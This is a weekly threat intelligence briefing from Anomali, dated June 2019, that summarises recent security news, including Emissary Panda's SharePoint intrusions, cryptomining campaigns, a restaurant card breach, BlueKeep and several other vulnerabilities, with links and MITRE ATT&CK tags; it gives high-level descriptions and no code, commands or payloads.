June 4, 2019
-
Anomali Threat Research
,

Weekly Threat Briefing: Emissary Panda Attacks Middle East Government Sharepoint Servers

<p>The intelligence in this week's iteration discuss the following threats: <b>APT</b>, <b>Credential theft</b>, <b>Cryptomining</b>, <b>Data theft</b>, <b>Phishing</b>, <b>Payment card theft</b>, <b>Targeted attacks</b>, and<b> Vulnerabilities</b>. The IOCs related to these stories are attached to the Community Threat Briefing and can be used to check your logs for potential malicious activity.</p><h2>Trending Threats</h2><p><a href="https://www.bleepingcomputer.com/news/security/improper-app-check-revives-the-synthetic-clicks-issue-in-macos-mojave/" target="_blank"><b>Improper App Check Revives the Synthetic Clicks Issue in macOS Mojave </b></a> (<i>June 3, 2019</i>)<br/> macOS researcher, Patrick Wardle, has identified an unpatched flaw in the app verification process on macOS Mojave. The vulnerability allows for legacy apps to load and execute unverified code. A trusted application can be changed by executing code on the machine without the users knowledge, allowing for a malicious event. Automatic clicks allows for prompts to be included to reduce user interaction. This is the second reported zero-day issue in two weeks that affects macOS Mojave, with a flaw that allows bypassing Gatekeeper with unsigned code on a network share was discovered by Filippo Cavallarin.<br/> <a href="https://forum.anomali.com/t/improper-app-check-revives-the-synthetic-clicks-issue-in-macos-mojave/3849" target="_blank">Click here for Anomali recommendation</a></p><p><a href="https://blog.trendmicro.com/trendlabs-security-intelligence/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims/" target="_blank"><b>Infected Cryptocurrency-mining Containers Target Docker Hosts With Exposed APIs, Use Shodan to Find Additional Victims</b></a> (<i>May 30, 2019</i>)<br/> Trend Micro researchers have identified o Docker containers with exposed APIs that are being used to host threats. Using the internet-scanning tool, Shodan, a script is created to search for hosts with exposed APIs, and once one is found Docker commands are used to create a container for malicious code. A coin-mining binary for Monero cryptocurrency is then called with scripts looking for new hosts to infect. Each host is added to an IP list that Command and Control (C2) servers will iterate through when looking for a new host, looping back to the beginning to begin the process again.<br/> <a href="https://forum.anomali.com/t/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims/3850" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947201">[MITRE ATT&amp;CK] Scripting (T1064)</a> | <a href="https://ui.threatstream.com/ttp/947205">[MITRE ATT&amp;CK] User Execution (T1204)</a></p><p><a href="https://www.zdnet.com/article/checkers-restaurant-chain-discloses-card-breach/" target="_blank"><b>Checkers Restaurant Chain Discloses Card Breach</b></a> (<i>May 30, 2019</i>)<br/> The US-based drive-thru restaurant chain, "Checkers and Rally's," has disclosed that an attack took place on May 29 that impacted over 100 locations. The company said their systems were breached with malware planted on the payments-processing system to steal information from the magnetic stripe of a payment card. The information includes cardholder name, card number, card verification code, and expiration date. Most restaurants were cleaned in April 2019, when the malware was discovered, however the infections date back to September 2016, with most occurring in 2018 and 2019. Checkers is working with federal law enforcement in regards to the attack.<br/> <a href="https://forum.anomali.com/t/checkers-restaurant-chain-discloses-card-breach/3851" target="_blank">Click here for Anomali recommendation</a></p><p><a href="https://www.intezer.com/blog-hiddenwasp-malware-targeting-linux-systems/" target="_blank"><b>HiddenWasp Malware Stings Targeted Linux Systems</b></a> (<i>May 29, 2019</i>)<br/> A new malware named "HiddenWasp" has been found targeting Linux systems, according to Intezer researchers. The malware is a trojan used for targeted remote control of a system utilizing advanced evasion techniques. Due to analysis on the infected systems, it appears as the target systems may already be under control from attackers or another group working aside this threat group. Using a deployment script, trojan and rootkit, the threat actors behind this malware can gain remote access to a target system, and enforcing persistence. As the malware creates a new sftp, the actors can still have access to the system even when HiddenWasp is removed.<br/> <a href="https://forum.anomali.com/t/hiddenwasp-malware-stings-targeted-linux-systems/3852" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947201">[MITRE ATT&amp;CK] Scripting (T1064)</a> | <a href="https://ui.threatstream.com/ttp/947273">[MITRE ATT&amp;CK] Create Account (T1136)</a> | <a href="https://ui.threatstream.com/ttp/947092">[MITRE ATT&amp;CK] Rootkit (T1014)</a> | <a href="https://ui.threatstream.com/ttp/947173">[MITRE ATT&amp;CK] Hooking (T1179)</a> | <a href="https://ui.threatstream.com/ttp/1259968">[MITRE PRE-ATT&amp;CK] Host-based hiding techniques (PRE-T1091)</a> | <a href="https://ui.threatstream.com/ttp/947210">[MITRE ATT&amp;CK] Exfiltration Over Command and Control Channel (T1041)</a></p><p><a href="https://www.newsbtc.com/2019/05/29/crypto-scam-alert-youtube-videos-promoting-bitcoin-generator-really-pushing-malware/" target="_blank"><b>Crypto Scam Alert: Youtube Videos Promoting "Bitcoin Generator" Really Pushing Malware</b></a> (<i>May 29, 2019</i>)<br/> A new cryptomining campaign has been discovered by a researcher called "Frost," that uses Youtube to persuade users to download a "Bitcoin generator." Once the user clicks on the download link, they are directed to download and run a Setup.exe file, which will infect their machine with the "Qulab" trojan. The Qulab Trojan attempts to steal data from user's browser including history, cookies and social media credentials, saved credentials, including .txt, .mafiles and .wallet files. Clipboard data is also stolen by Qulab, which can contain cryptocurrency addresses, the attacker can then change the victims public key, sending their crypto to the attackers wallet instead.<br/> <a href="https://forum.anomali.com/t/crypto-scam-alert-youtube-videos-promoting-bitcoin-generator-really-pushing-malware/3853" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947205">[MITRE ATT&amp;CK] User Execution (T1204)</a></p><p><a href="https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/" target="_blank"><b>The Nansh0u Campaign - Hackers Arsenal Grows Stronger</b></a> (<i>May 29, 2019</i>)<br/> Guardicore Labs have been monitoring a Chinese-based attack that seeks to infect MS-SQL and PHPMyAdmin servers to drop a crypto-miner. The attacks appear to have begun around February with 20 versions of payload being utilized to date. The targets of the campaign include IT, healthcare, media and telecommunications with over 50,000 infected servers. The MS-SQL attacks were comprised of three components - a port scanner, MS-SQL brute-force tool, and a remote code executor. This attack uses cyber weapons that would previously be used in nation state attacks, however they are becoming more accessible to non-state actors.<br/> <a href="https://forum.anomali.com/t/the-nansh0u-campaign-hackers-arsenal-grows-stronger/3854" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/1259903">[MITRE PRE-ATT&amp;CK] Authentication attempt (PRE-T1158)</a> | <a href="https://ui.threatstream.com/ttp/947201">[MITRE ATT&amp;CK] Scripting (T1064)</a> | <a href="https://ui.threatstream.com/ttp/947227">[MITRE ATT&amp;CK] Brute Force (T1110)</a> | <a href="https://ui.threatstream.com/ttp/947233">[MITRE ATT&amp;CK] Exploitation for Privilege Escalation (T1068)</a> | <a href="https://ui.threatstream.com/ttp/947235">[MITRE ATT&amp;CK] Obfuscated Files or Information (T1027)</a></p><p><a href="https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/" target="_blank"><b>Emissary Panda Attacks Middle East Government Sharepoint Servers</b></a> (<i>May 28, 2019</i>)<br/> Unit 42 researchers, has observed an attack by Emissary Panda (APT27) targeting two Middle Eastern government organizations. The attack took place on April 1 and April 16, 2019, with the group exploiting a remote code execution vulnerability in Microsoft Sharepoint, CVE-2019-0604. This vulnerability allowed for the actors to remotely upload three webshells which included backdoors, vulnerability scanners and tools to steal credentials. Although Microsoft patched the vulnerability, attackers were able to quickly abuse it before the victims' systems had been updated. Once Emissary Panda gained access through the Sharepoint vulnerability, they were able to exploit another vulnerability, CVE-2017-0144 (EternalBlue) to pivot to other systems. The affected governments have not been named.<br/> <a href="https://forum.anomali.com/t/emissary-panda-attacks-middle-east-government-sharepoint-servers/3855" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947247">[MITRE ATT&amp;CK] Web Shell (T1100)</a> | <a href="https://ui.threatstream.com/ttp/947201">[MITRE ATT&amp;CK] Scripting (T1064)</a> | <a href="https://ui.threatstream.com/ttp/1260045">[MITRE PRE-ATT&amp;CK] Upload, install, and configure software/tools (PRE-T1139)</a> | <a href="https://ui.threatstream.com/ttp/947232">[MITRE ATT&amp;CK] DLL Side-Loading (T1073)</a></p><p><a href="https://www.bleepingcomputer.com/news/security/duckduckgo-android-browser-vulnerable-to-url-spoofing-attacks/" target="_blank"><b>DuckDuckGo Android Browser Vulnerable to URL Spoofing Attacks</b></a> (<i>May 28, 2019</i>)<br/> A security flaw has been identified by security researcher, Dhiraj Mishra, on the Android mobile browser version of the "DuckDuckGo" search engine. The vulnerability, registered as "CVE-2019-12329," can allow for threat actors to spoof the address bar. By changing the URL in the address bar, attackers can trick users into believing they are on a trusted website, while being redirected to malicious websites, such as phishing sites, or a website containing malware. These attacks are particularly dangerous as they are much more difficult for users to detect.<br/> <a href="https://forum.anomali.com/t/duckduckgo-android-browser-vulnerable-to-url-spoofing-attacks/3856" target="_blank">Click here for Anomali recommendation</a></p><p><a href="https://www.bleepingcomputer.com/news/security/unpatched-flaw-affects-all-docker-versions-exploits-ready/" target="_blank"><b>Contain Yourself, Docker: Race-condition Bug Puts Host Machines at Risk... Sometimes, Ish</b></a> (<i>May 28, 2019</i>)<br/> A vulnerability in all versions of Docker, a widely used platform for deploying applications, has been discovered by Aleksa Sarai. The vulnerability can potentially be exploited to read and write on host machine, bypass container security protections and execute code. Exploiting this vulnerability, can allow a threat actor to alter the host file system when a host administrator is copying data in or out of a docker container. Using a symlink, term for a file that contains another reference to another file or directory, the host file system paths could be altered that could enable the host file system to also be altered. The research suggests that changes to docker are almost impossible, with less ideal fixes such as such as pausing containers during file operations being the suggested fix.<br/> <a href="https://forum.anomali.com/t/contain-yourself-docker-race-condition-bug-puts-host-machines-at-risk-sometimes-ish/3857" target="_blank">Click here for Anomali recommendation</a></p><p><a href="https://www.fortinet.com/blog/threat-research/rocke-variant-ready-to-box-mining-challengers.html" target="_blank"><b>New Rocke Variant Ready to Box Any Mining Challengers</b></a> (<i>May 28, 2019</i>)<br/> A malware threat group specializing in cryptomining called, "Rocke", has been observed by FortiGuard Labs researchers to have added new features the cryptomining malware. Hosted on PasteBin, the malware can be installed on systems through a number of means including automated internet vulnerability scanning, service login brute-forcing and exploitations. Using hook libraries, the malware is able to stay on the system longer, as it is more difficult for users to detect and remove. Recently, threat actors have been targeting systems running Jenkins by attempting to exploit the vulnerabilities CVE-2018-1000861 and CVE-2019-1003000.<br/> <a href="https://forum.anomali.com/t/new-rocke-variant-ready-to-box-any-mining-challengers/3858" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947201">[MITRE ATT&amp;CK] Scripting (T1064)</a> | <a href="https://ui.threatstream.com/ttp/85773">Cron Job/Scheduled Tasks</a> | <a href="https://ui.threatstream.com/ttp/947240">[MITRE ATT&amp;CK] Data Compressed (T1002)</a> | <a href="https://ui.threatstream.com/ttp/947148">[MITRE ATT&amp;CK] New Service (T1050)</a> | <a href="https://ui.threatstream.com/ttp/947173">[MITRE ATT&amp;CK] Hooking (T1179)</a> | <a href="https://ui.threatstream.com/ttp/947227">[MITRE ATT&amp;CK] Brute Force (T1110)</a> | <a href="https://ui.threatstream.com/ttp/947190">[MITRE ATT&amp;CK] Connection Proxy (T1090)</a></p><p><a href="https://www.bleepingcomputer.com/news/security/phishing-emails-pretend-to-be-office-365-file-deletion-alerts/" target="_blank"><b>Phishing Email Pretends to be Office 365 'File Deletion' Alerts</b></a> (<i>May 28, 2019</i>)<br/> A new phishing campaign has been launched pretending to be from Microsoft Office 365. The actors behind this campaign distributes emails claiming that an unusual amount of files have been deleted on their account, sending a "medium-severity" alert. A link titled "View Alert Details" brings the user to a fake Microsoft login page.The credentials entered into the site were observed being sent to an Azure website controlled by the actors who may save them for future malicious purposes or offer them for purchase on underground forums.<br/> <a href="https://forum.anomali.com/t/phishing-email-pretends-to-be-office-365-file-deletion-alerts/3859" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947205">[MITRE ATT&amp;CK] User Execution (T1204)</a> | <a href="https://ui.threatstream.com/ttp/947106">[MITRE ATT&amp;CK] Spearphishing Link (T1192)</a></p><p><a href="https://thehackernews.com/2019/05/bluekeep-rdp-vulnerability.html" target="_blank"><b>Nearly One Million Still Vulnerable to "Wormable" BlueKeep RDP Flaw</b></a> (<i>May 28, 2019</i>)<br/> Two weeks after Microsoft released a security patch for a wormable, remote code execution vulnerability, registered as "CVE-2019-0708," nearly one million systems are still unpatched. The vulnerability, named "BlueKeep," could allow for a remote attacker to gain access to a target computer by sending requests to the Remote Desktop Service via the Remote Desktop Protocol, with the potential for an attack similar to the global ransomware campaigns, WannaCry and NotPetya. During Microsoft's May 2019 Patch Tuesday, a patch was released to address the vulnerability, however a scan performed by Robert Graham revealed almost one million systems have not deployed the patch.<br/> <a href="https://forum.anomali.com/t/nearly-one-million-still-vulnerable-to-wormable-bluekeep-rdp-flaw/3860" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947156">[MITRE ATT&amp;CK] Remote Desktop Protocol (T1076)</a></p><p><a href="https://blog.sucuri.net/2019/05/return-to-the-city-of-cron-malware-infections-on-joomla-and-wordpress.html" target="_blank"><b>Return of the City of Cron Malware Infections on Joomla and WordPress</b></a> (<i>May 27, 2019</i>)<br/> A persistent malware infection has been found in a shared hosting environment by Sucuri. The malware operates by detecting if the website is Joomla or WordPress by their directory structures, which it uses to determine which method to utilize in infecting the files. Using a backdoor cron job, the malware is still able to reinfect files, even after they have been cleaned. The files are stored in the /tmp directory which makes it harder to detect malicious files, as it is rarely scanned.<br/> <a href="https://forum.anomali.com/t/return-of-the-city-of-cron-malware-infections-on-joomla-and-wordpress/3861" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/85773">Cron Job/Scheduled Tasks</a></p>

Get the Latest Anomali Updates and Cybersecurity News – Straight To Your Inbox

Become a subscriber to the Anomali Newsletter
Receive a monthly summary of our latest threat intelligence content, research, news, events, and more.